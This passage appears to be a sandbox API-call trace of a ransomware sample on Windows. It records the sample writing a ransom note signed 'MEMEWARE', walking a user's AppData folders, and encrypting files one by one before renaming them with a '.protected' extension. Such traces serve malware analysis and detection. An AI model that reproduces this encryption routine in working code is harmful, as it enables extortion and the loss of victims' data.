(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.454] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0087.454] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.454] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0087.454] CloseHandle (hObject=0xd4) returned 1 [0087.455] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0087.455] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0087.455] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned 60 [0087.455] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0087.455] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0087.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*") returned 62 [0087.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0087.455] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.455] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.455] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.455] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\.") returned 62 [0087.455] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.455] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0087.455] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0087.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0087.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.456] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\..") returned 63 [0087.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.456] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.456] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0087.456] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0087.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.456] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 77 [0087.456] lstrcmpW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0087.456] lstrcmpW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0087.456] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned 79 [0087.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0087.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.") returned 79 [0087.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.456] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0087.456] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0087.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0087.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.457] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.457] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\..") returned 80 [0087.457] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.457] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.457] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0087.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0087.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.457] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Windows") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Program Files") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Program Files (x86)") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="$Recycle.bin") returned 1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="System Volume Information") returned -1 [0087.457] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 85 [0087.457] lstrcmpW (lpString1="Content", lpString2=".") returned 1 [0087.457] lstrcmpW (lpString1="Content", lpString2="..") returned 1 [0087.457] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned 87 [0087.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.") returned 87 [0087.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.458] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0087.458] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\..") returned 88 [0087.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.458] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.458] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrIW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".protected") returned 0x0 [0087.459] lstrcmpW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="RESTORE_FILES.txt") returned -1 [0087.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".rar") returned 0x0 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".zip") returned 0x0 [0087.459] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.461] CloseHandle (hObject=0x150) returned 1 [0087.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected") returned 161 [0087.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.protected")) returned 1 [0087.463] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Windows") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files (x86)") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="$Recycle.bin") returned 1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="System Volume Information") returned -1 [0087.463] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.463] StrStrIW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".protected") returned 0x0 [0087.463] lstrcmpW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="RESTORE_FILES.txt") returned -1 [0087.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.463] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".rar") returned 0x0 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".zip") returned 0x0 [0087.473] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x561, lpOverlapped=0x0) returned 1 [0087.530] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.530] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x561, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x561, lpOverlapped=0x0) returned 1 [0087.531] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.531] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, 